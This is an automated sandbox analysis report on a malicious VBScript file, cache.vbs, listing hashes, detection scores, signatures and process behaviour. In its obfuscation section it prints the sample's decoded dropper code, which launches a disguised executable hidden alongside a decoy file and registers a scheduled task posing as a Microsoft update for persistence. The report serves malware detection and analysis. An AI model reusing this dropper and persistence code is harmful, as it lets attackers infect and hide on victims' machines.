Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cache.vbs

Overview

General Information

Sample name:cache.vbs
Analysis ID:1528871
MD5:7e98bb7ffba4cf12d29132a2c71973eb
SHA1:891b5908cee1908d62429ac2515beb8c1f7e63f2
SHA256:da0ae773603dc68d9bae4713afd8dbf89b1db5f891057b636380fa123a68c550
Tags:vbsuser-JAMESWT_MHT
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5260 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", ProcessId: 5260, ProcessName: wscript.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs", ProcessId: 5260, ProcessName: wscript.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: cache.vbsReversingLabs: Detection: 28%
Source: cache.vbsVirustotal: Detection: 30%Perma Link

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: cache.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal64.evad.winVBS@1/0@0/0
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs"
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: cache.vbsReversingLabs: Detection: 28%
Source: cache.vbsVirustotal: Detection: 30%
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject")Dim currentPathcurrentPath = objFSO.GetAbsolutePathName(".")strFilePath = currentPath & "\_cache\cache\cache.bak"strNewFilePath = currentPath & "\_cache\cache\sigverif.exe"objFSO.MoveFile strFilePath, strNewFilePathSet objFSO = NothingDim filenameb64filenameb64 = DecodeBase64("5Y2a5aOr5ZCO55Sz6K+3LeeOi+eOieeOui3ljY7kuK3np5HmioDlpKflraYt55S15rCU5LiO55S15a2Q5bel56iL5Y2a5aOrLeeugOWOhi5wZGY=")Dim fsoSet fso = WScript.CreateObject("Scripting.FileSystemObject")Dim sourcePath,destinationPath,runfile,runfile2sourcePath = currentPath & "\_cache\cache\" & "cache.db"destinationPath = currentPath & "\" & filenameb64deleteFile = currentPath & "\" & filenameb64 & ".lnk"runfile = Chr(34) & currentPath & "\_cache\cache\sigverif.exe" & Chr(34)runfile2 = currentPath & "\_cache\cache\sigverif.exe"fso.MoveFile sourcePath, destinationPathfso.DeleteFile deleteFileDim tempFolder, tempPathtempFolder = fso.GetSpecialFolder(2)tempPath = tempFolder & "\sigverif.exe"fso.CopyFile runfile2, tempPath, TrueDim v1v1 = Chr(34) & destinationPath & Chr(34)Set WshShell = CreateObject("WScript.Shell")WshShell.Run v1, 0, FalseWshShell.Run tempPath, 0, Falsefso.DeleteFile runfile2Set WshShell = NothingDim shellPathDim taskName shellPath = tempPathtaskName = "WpnUserService_x64" Const TriggerTypeDaily = 1Const ActionTypeExec = 0Set service = CreateObject("Schedule.Service")Call service.ConnectDim rootFolderSet rootFolder = service.GetFolder("\")Dim taskDefinitionSet taskDefinition = service.NewTask(0)Dim regInfoSet regInfo = taskDefinition.RegistrationInforegInfo.Description = "Update"regInfo.Author = "Microsoft"Dim settingsSet settings = taskDefinition.settingssettings.Enabled = Truesettings.StartWhenAvailable = Truesettings.Hidden = Falsesettings.DisallowStartIfOnBatteries = FalseDim triggersSet triggers = taskDefinition.triggersDim triggerOn Error Resume Next CreateObject("WScript.Shell").RegRead ("HKEY_USERS\S-1-5-19\Environment\TEMP") If Err.Number = 0 Then IsAdmin = True Set trigger = triggers.Create(8) Set trigger = triggers.Create(9) Else IsAdmin = False End If Err.Clear On Error GoTo 0Set trigger = triggers.Create(7)Set trigger = triggers.Create(6)Set trigger = triggers.Create(TriggerTypeDaily)Dim startTime, endTimeDim timetime = DateAdd("n", 2, Now)Dim cSecond, cMinute, CHour, cDay, cMonth, cYearDim tTime, tDatecSecond = "0" & Second(time)cMinute = "0" & Minute(time)CHour = "0" & Hour(time)cDay = "0" & Day(time)cMonth = "0" & Month(time)cYear = Year(time)tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & ":" & Right(cSecond, 2)tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)startTime = tDate & "T" & tTimeendTime = "2099-05-02T10:52:02"trigger.StartBoundary = startTimetrigger.EndBoundary = endTimetrigger.ID = "TimeTriggerId"trigger.Enabled = TrueDim repetitionPatternSet repetitionPattern = trigger.Repetitionrepeti
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information121
Scripting		Valid AccountsWindows Management Instrumentation121
Scripting		1
DLL Side-Loading		1
DLL Side-Loading		OS Credential Dumping2
System Information Discovery		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		Boot or Logon Initialization Scripts1
Obfuscated Files or Information		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cache.vbs29%ReversingLabsScript-WScript.Packed.Generic
cache.vbs31%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1528871
Start date and time:2024-10-08 11:01:17 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 51s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:cache.vbs
Detection:MAL
Classification:mal64.evad.winVBS@1/0@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .vbs

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:data
Entropy (8bit):5.632358798821212
TrID:
  • Visual Basic Script (13500/0) 100.00%
File name:cache.vbs
File size:7'660 bytes
MD5:7e98bb7ffba4cf12d29132a2c71973eb
SHA1:891b5908cee1908d62429ac2515beb8c1f7e63f2
SHA256:da0ae773603dc68d9bae4713afd8dbf89b1db5f891057b636380fa123a68c550
SHA512:d7589cfb3a8d7bbedee520663ba536b72cef5c35279efe15deec052af4627e618dc831f94ccc256eb41dd5248d94bef993bfb638d0b49f109ce2031b2c25c575
SSDEEP:192:v0nGM+8Nngp99wdFs2Ip6bNSaTKp6hGuz22vc/4KW:v61NgpY+6bNSaTKpIGuz22vx
TLSH:0DF1E596BB29B5DDA0E2C1A3F42F4ED9F411A1B304A5A91370DEF6600FF01C6358349A
File Content Preview:Const msiOpenDatabaseModeReadOnly = 0....' Show help if no arguments or if argument contains ?..Dim argCount : argCount = Wscript.Arguments.Count..If argCount > 0 Then If InStr(1, Wscript.Arguments(0), "?", vbTextCompare) > 0 Then argCount = 0..If argCoun

File Icon

Icon Hash:68d69b8f86ab9a86

Network Behavior

No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

General

Target ID:0
Start time:05:02:09
Start date:08/10/2024
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs"
Imagebase:0x7ff60d4a0000
File size:170'496 bytes
MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Disassembly

No disassembly